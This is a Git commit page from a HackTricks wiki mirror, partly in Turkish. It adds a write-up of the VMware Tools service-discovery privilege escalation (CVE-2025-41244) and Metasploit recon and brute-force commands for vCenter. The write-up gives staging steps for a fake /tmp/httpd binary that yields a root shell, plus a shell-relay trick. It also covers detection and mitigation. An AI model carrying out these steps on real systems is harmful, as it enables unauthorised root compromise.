maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/linux-hardening/privilege-escalation/vmware-tools-servi

Browse Source
This commit is contained in:
Translator 2025-10-01 10:23:45 +00:00
parent 320d18d7d1
commit 7fa0621c33
4 changed files with 507 additions and 294 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
src/SUMMARY.md
View File

@ -110,6 +110,7 @@
- [Checklist - Linux Privilege Escalation](linux-hardening/linux-privilege-escalation-checklist.md)
- [Linux Privilege Escalation](linux-hardening/privilege-escalation/README.md)
- [Android Rooting Frameworks Manager Auth Bypass Syscall Hook](linux-hardening/privilege-escalation/android-rooting-frameworks-manager-auth-bypass-syscall-hook.md)
- [Vmware Tools Service Discovery Untrusted Search Path Cve 2025 41244](linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md)
- [Arbitrary File Write to Root](linux-hardening/privilege-escalation/write-to-root.md)
- [Cisco - vmanage](linux-hardening/privilege-escalation/cisco-vmanage.md)
- [Containerd (ctr) Privilege Escalation](linux-hardening/privilege-escalation/containerd-ctr-privilege-escalation.md)

636
src/linux-hardening/privilege-escalation/README.md
View File

File diff suppressed because it is too large Load Diff

146
src/linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md Normal file
View File

@ -0,0 +1,146 @@
# VMware Tools service discovery LPE (CWE-426) via regex-based binary discovery (CVE-2025-41244)
{{#include ../../banners/hacktricks-training.md}}
Bu teknik, çalışan süreçlerin komut satırlarını parse eden ve servis sürümlerini çıkartıp aday bir ikiliyi "version" flag'iyle çalıştıran regex-tabanlı service discovery pipeline'larını kötüye kullanır. İzin verici desenler, kontrolsüz ve saldırgan tarafından kontrol edilen yolları (ör. /tmp/httpd) kabul ettiğinde, ayrıcalıklı toplayıcı kontrolsüz bir konumdan rastgele bir ikiliyi çalıştırır ve bu da yerel ayrıcalık yükseltimine yol açar. NVISO bunu VMware Tools/Aria Operations Service Discovery içinde CVE-2025-41244 olarak belgeledi.
- Etki: Yerel ayrıcalık yükseltme root'a (veya ayrıcalıklı discovery hesabına)
- Temel neden: Untrusted Search Path (CWE-426) + süreç komut satırlarının izin verici regex eşleştirmesi
- Etkilenenler: open-vm-tools/VMware Tools on Linux (credential-less discovery), VMware Aria Operations SDMP (credential-based discovery via Tools/proxy)
## How VMware service discovery works (high level)
- Credential-based (legacy): Aria, yapılandırılmış ayrıcalıklı kimlik bilgilerini kullanarak VMware Tools aracılığıyla guest içinde discovery script'lerini çalıştırır.
- Credential-less (modern): Discovery mantığı VMware Tools içinde, guest'te zaten ayrıcalıklı olarak çalışır.
Her iki mod da nihayetinde dinleyen soketleri olan süreçleri tarayan, bir regex ile eşleşen komut yolunu çıkaran ve ilk argv token'ını bir version flag ile çalıştıran shell mantığını çalıştırır.
## Root cause and vulnerable pattern (open-vm-tools)
open-vm-tools içinde, serviceDiscovery plugin script get-versions.sh aday ikilileri geniş regular expression'larla eşler ve herhangi bir trusted-path doğrulaması yapmadan ilk token'ı çalıştırır:
```bash
get_version() {
PATTERN=$1
VERSION_OPTION=$2
for p in $space_separated_pids
do
COMMAND=$(get_command_line $p | grep -Eo "$PATTERN")
[ ! -z "$COMMAND" ] && echo VERSIONSTART "$p" "$("${COMMAND%%[[:space:]]*}" $VERSION_OPTION 2>&1)" VERSIONEND
done
}
```
Bu, \S (boşluk olmayan) içeren esnek desenlerle çağrılır; bu desenler kullanıcı tarafından yazılabilir konumlardaki sistem dışı yollarla sorunsuzca eşleşir:
```bash
get_version "/\S+/(httpd-prefork|httpd|httpd2-prefork)($|\s)" -v
get_version "/usr/(bin|sbin)/apache\S*" -v
get_version "/\S+/mysqld($|\s)" -V
get_version "\.?/\S*nginx($|\s)" -v
get_version "/\S+/srm/bin/vmware-dr($|\s)" --version
get_version "/\S+/dataserver($|\s)" -v
```
- Extraction grep -Eo kullanır ve ilk token'ı alır: ${COMMAND%%[[:space:]]*}
- Güvenilen sistem yolları için herhangi bir whitelist/allowlist yok; eşleşen ada sahip bulunan herhangi bir listener -v/--version ile çalıştırılır
Bu, bir untrusted search path execution primitive oluşturur: world-writable dizinlerde bulunan rastgele ikili dosyalar (örn., /tmp/httpd) ayrıcalıklı bir bileşen tarafından çalıştırılır.
## Exploitation (both credential-less and credential-based modes)
Preconditions
- Guest üzerinde listening socket açan bir unprivileged process çalıştırabilirsiniz.
- Discovery job etkin ve periyodik olarak çalışır (tarihi olarak ~5 dakika).
Steps
1) İzin veren regex'lerden birine uyan bir yola bir binary yerleştirin, örn. /tmp/httpd veya ./nginx
2) Bunu low-privileged bir kullanıcı olarak çalıştırın ve herhangi bir listening socket açtığından emin olun
3) Discovery cycle'ı bekleyin; privileged collector otomatik olarak şu komutu çalıştıracaktır: /tmp/httpd -v (veya benzeri), böylece programınız root olarak çalışır
Minimal demo (using NVISOs approach)
```bash
# Build any small helper that:
# - default mode: opens a dummy TCP listener
# - when called with -v/--version: performs the privileged action (e.g., connect to an abstract UNIX socket and spawn /bin/sh -i)
# Example staging and trigger
cp your_helper /tmp/httpd
chmod +x /tmp/httpd
/tmp/httpd # run as low-priv user and wait for the cycle
# After the next cycle, expect a root shell or your privileged action
```
Tipik süreç soy ağacı
- Kimlik bilgisi tabanlı: /usr/bin/vmtoolsd -> /bin/sh /tmp/VMware-SDMP-Scripts-.../script_...sh -> /tmp/httpd -v -> /bin/sh -i
- Kimlik bilgisi olmadan: /bin/sh .../get-versions.sh -> /tmp/httpd -v -> /bin/sh -i
Artefaktlar (kimlik bilgisi tabanlı)
Kurtarılan SDMP wrapper scriptleri /tmp/VMware-SDMP-Scripts-{UUID}/ altında kötü amaçlı yolun doğrudan çalıştırılmasını gösterebilir:
```bash
/tmp/httpd -v >"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stdout" 2>"/tmp/VMware-SDMP-Scripts-{UUID}/script_-{ID}_0.stderr"
```
## Generalizing the technique: regex-driven discovery abuse (portable pattern)
Many agents and monitoring suites implement version/service discovery by:
- Enumerating processes with listening sockets
- Grepping argv/command lines with permissive regexes (e.g., patterns containing \S)
- Executing the matched path with a benign flag like -v, --version, -V, -h
If the regex accepts untrusted paths and the path is executed from a privileged context, you get CWE-426 Untrusted Search Path execution.
Abuse recipe
- Name your binary like common daemons that the regex is likely to match: httpd, nginx, mysqld, dataserver
- Place it in a writable directory: /tmp/httpd, ./nginx
- Ensure it matches the regex and opens any port to be enumerated
- Wait for the scheduled collector; you get an automatic privileged invocation of <path> -v
Masquerading note: This aligns with MITRE ATT&CK T1036.005 (Match Legitimate Name or Location) to increase match probability and stealth.
Reusable privileged I/O relay trick
- Build your helper so that on privileged invocation (-v/--version) it connects to a known rendezvous (e.g., a Linux abstract UNIX socket like @cve) and bridges stdio to /bin/sh -i. This avoids on-disk artifacts and works across many environments where the same binary is re-invoked with a flag.
## Detection and DFIR guidance
Hunting queries
- Uncommon children of vmtoolsd or get-versions.sh such as /tmp/httpd, ./nginx, /tmp/mysqld
- Any execution of non-system absolute paths by discovery scripts (look for spaces in ${COMMAND%%...} expansions)
- ps -ef --forest to visualize ancestry trees: vmtoolsd -> get-versions.sh -> <non-system path>
On Aria SDMP (credential-based)
- Inspect /tmp/VMware-SDMP-Scripts-{UUID}/ for transient scripts and stdout/stderr artifacts showing execution of attacker paths
Policy/telemetry
- Alert when privileged collectors execute from non-system prefixes: ^/(tmp|home|var/tmp|dev/shm)/
- File integrity monitoring on get-versions.sh and VMware Tools plugins
## Mitigations
- Patch: CVE-2025-41244 için Broadcom/VMware güncellemelerini uygulayın (Tools ve Aria Operations SDMP)
- Disable or restrict credential-less discovery where feasible
- Validate trusted paths: yürütmeyi allowlistlenmiş dizinlerle kısıtlayın (/usr/sbin, /usr/bin, /sbin, /bin) ve sadece tam olarak bilinen ikili dosyalara izin verin
- Avoid permissive regexes with \S; tercih edin: anchored, explicit absolute paths ve exact command names
- Drop privileges for discovery helpers where possible; sandbox (seccomp/AppArmor) ile etkisini azaltın
- Monitor for and alert on vmtoolsd/get-versions.sh executing non-system paths
## Notes for defenders and implementers
Safer matching and execution pattern
```bash
# Bad: permissive regex and blind exec
COMMAND=$(get_command_line "$pid" | grep -Eo "/\\S+/nginx(\$|\\s)")
[ -n "$COMMAND" ] && "${COMMAND%%[[:space:]]*}" -v
# Good: strict allowlist + path checks
candidate=$(get_command_line "$pid" | awk '{print $1}')
case "$candidate" in
/usr/sbin/nginx|/usr/sbin/httpd|/usr/sbin/apache2)
"$candidate" -v 2>&1 ;;
*)
: # ignore non-allowlisted paths
;;
esac
```
## Kaynaklar
- [NVISO You name it, VMware elevates it (CVE-2025-41244)](https://blog.nviso.eu/2025/09/29/you-name-it-vmware-elevates-it-cve-2025-41244/)
- [Broadcom advisory for CVE-2025-41244](https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/36149)
- [open-vm-tools serviceDiscovery/get-versions.sh (stable-13.0.0)](https://github.com/vmware/open-vm-tools/blob/stable-13.0.0/open-vm-tools/services/plugins/serviceDiscovery/get-versions.sh)
- [MITRE ATT&CK T1036.005 Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005/)
- [CWE-426: Untrusted Search Path](https://cwe.mitre.org/data/definitions/426.html)
{{#include ../../banners/hacktricks-training.md}}

18
src/network-services-pentesting/pentesting-web/vmware-esx-vcenter....md
View File

@ -1,14 +1,26 @@
# VMware ESX / vCenter Pentesting
{{#include ../../banners/hacktricks-training.md}}
# Sayım
## Keşif
```bash
nmap -sV --script "http-vmware-path-vuln or vmware-version" -p <PORT> <IP>
msf> use auxiliary/scanner/vmware/esx_fingerprint
msf> use auxiliary/scanner/http/ms15_034_http_sys_memory_dump
```
# Bruteforce
## Bruteforce
```bash
msf> auxiliary/scanner/vmware/vmware_http_login
```
Geçerli kimlik bilgileri bulursanız, bilgi almak için daha fazla metasploit tarayıcı modülü kullanabilirsiniz.
Geçerli kimlik bilgileri bulursanız, bilgi edinmek için daha fazla metasploit scanner modules kullanabilirsiniz.
### Ayrıca bakınız
Linux LPE via VMware Tools service discovery (CWE-426 / CVE-2025-41244):
{{#ref}}
../../linux-hardening/privilege-escalation/vmware-tools-service-discovery-untrusted-search-path-cve-2025-41244.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}